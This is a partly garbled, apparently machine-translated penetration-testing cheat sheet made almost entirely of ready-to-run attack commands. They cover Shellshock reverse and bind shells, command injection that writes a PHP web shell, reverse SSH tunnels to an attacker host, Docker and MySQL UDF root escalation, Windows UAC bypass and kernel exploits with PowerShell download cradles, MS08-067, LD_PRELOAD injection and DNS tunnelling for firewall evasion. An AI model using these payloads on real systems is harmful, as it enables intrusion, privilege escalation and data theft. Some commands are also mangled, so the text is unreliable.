SocksPolicy accept 127.0.0.1 SocksPolicy accept 192.168.0.0/16 Log notice file /var/log/tor/notices.log RunAsDaemon 1 HiddenServiceDir /var/lib/tor/ssh_hidden_service/ HiddenServicePort 80 127.0.0.1:22 PublishServerDescriptor 0 $ /etc/init.d/tor start $ cat /var/lib/tor/ssh_hidden_service/hostname 3l5zstvt1zk5jhl662.onion
$ apt-get install torsocks $ torsocks ssh [email protected] -p 80 Metagoofil - Metadata Collection Tool
Note: Metagoofil is a tool that uses Google to collect information.
It can automatically search and analyze files in the search engine. It also provides other functions such as Mac address, user name list, etc.
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html 利用 Shellshock
$ ./shocker.py -H 192.168.56.118 --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo $(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
$ nc -l -p 443 $ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80 Get Docker's Root
ek maintenance @: ~ / $ dock-test it uid = 1001 (ek) gid = 1001 (i) groups = 1001 (i), 114 (docks)
ek @ victum: ~ $ mkdir docker test ek @ victum: ~ $ cd docker test
ek@victum:~$ cat > Dockerfile FROM debian:wheezy
ENV WORKDIR /stuff
RUN mkdir -p $WORKDIR
VOLUME [ $WORKDIR ]
WORKDIR $WORKDIR << EOF
ek@victum:$ docker build -t my-docker-image .
ek@victum:$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c
'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'
./sh
whoami
ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow' Using DNS Tunnels to Bypass Firewalls
dnscat2 supports uploading and downloading commands from the target host for files, data, and programs
$ apt-get update $ apt-get -y install ruby-dev git make g++ $ gem install bundler $ git clone https://github.com/iagox86/dnscat2.git $ cd dnscat2/server $ bundle install $ ruby ./dnscat2.rb dnscat2> New session established: 16059 dnscat2> session -i 16059
$ dnscat --host Compiling Assemble Code
$ nasm -f elf32 simple32.asm -a simple32.o $ ld -m elf_i386 simple32.o simple32
$ nasm -f elf64 simple.asm -o simple.o $ ld simple.o -o simple Use a non-interactive shell to enter the intranet
$ wget -O - -q "http://domain.tk/sh.php?cmd=whoami" $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N "" " $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa"
$ useradd -m tempuser $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys $ chmod 700 /home/tempuser/.ssh/authorized_keys $ chown -R tempuser:tempuser /home/tempuser/.ssh
$ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>" Take a shell using POST remote command execution
attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php'
attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php'
attacker:~$ curl http://victum.tk/shell.php?cmd=id
attacker:~$ nc -nvlp 1337 Bounce Shell with System Permission on Win7 as Administrator
msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe
net user
https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
echo $client = New-Object System.Net.WebClient > script.ps1 echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1 echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1 echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1
https://github.com/hfiref0x/UACME
Use the powershell script to upload https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe to the target machine
echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1 echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1
nc -lvp 4444
Akagi64.exe 1 C:\Users\User\Desktop\danger.exe
nc -lvp 4444
psexec.exe –i –d –accepteula –s danger.exe Bounce a shell with system privileges on Win7 as an ordinary user
https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051
https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
https://www.exploit-db.com/exploits/37049/
wmic qfe get wmic qfe | find "3057191"
https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
By default it executes cmd.exe with system privileges, but we need to change the source code to run our uploaded danger.exe
https://github.com/hfiref0x/CVE-2015-1701 Download it and navigate to "main.c"
http://www.ampliasecurity.com/research/windows-credentials-editor/
wce -w
http://www.heise.de/download/pwdump.html
MS08-067 - Don't use Metasploit
$ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205 $ searchsploit ms08-067 $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1 Acquiring rights through MySQL Root account
$ wget 0xdeadbeef.info/exploits/raptor_udf2.c $ gcc -g -c raptor_udf2.c $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc mysql -u root -p mysql> use mysql; mysql> create table foo(line blob); mysql> insert into foo values(load_file('/home/user/raptor_udf2.so')); mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; mysql> create function do_system returns integer soname 'raptor_udf2.so'; mysql> select * from mysql.func; mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');
user: ~ $ su -
Password:
user:# whoami
root
root:# id
uid=0(root) gid=0(root) groups=0(root)
Use LD_PRELOAD to inject program
$ wget https://github.com/jivoi/pentest/ldpreload_shell.c $ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so $ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft Enumerate timing attacks against OpenSSH users
Note: Enumeration Timing Attack is a side channel attack. Side channel attack refers to the use of out-of-channel information, such as the speed of encryption/decryption/chip pin encryption and decryption. The way in which the voltage and ciphertext traffic, etc., are attacked is described by one word as "paraphrasing." – Refer to the self-explaining explanations of shotgun.
Osueta is a python2 script for timing attacks on OpenSSH. It can use timing attacks to enumerate OpenSSH usernames and, under certain conditions, can perform DOS attacks on OpenSSH servers.
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt Use ReDuh to construct a legal HTTP request to establish a TCP channel
Note: ReDuh is a tool for tunneling various other data through the HTTP protocol. It can forward the port of the intranet server to this unit through the http/https tunnel to form a connection loop. Used when the target server is connected to the internal open port of the target server when the internal network or port policy is used.
The Pro-ReDuh-Gui is known as the port forwarding artifact.
$ http://192.168.10.50/uploads/reDuh.jsp
$ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
$ nc -nvv 127.0.0.1 1010
[createTunnel] 7777:172.16.0.4:3389
$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777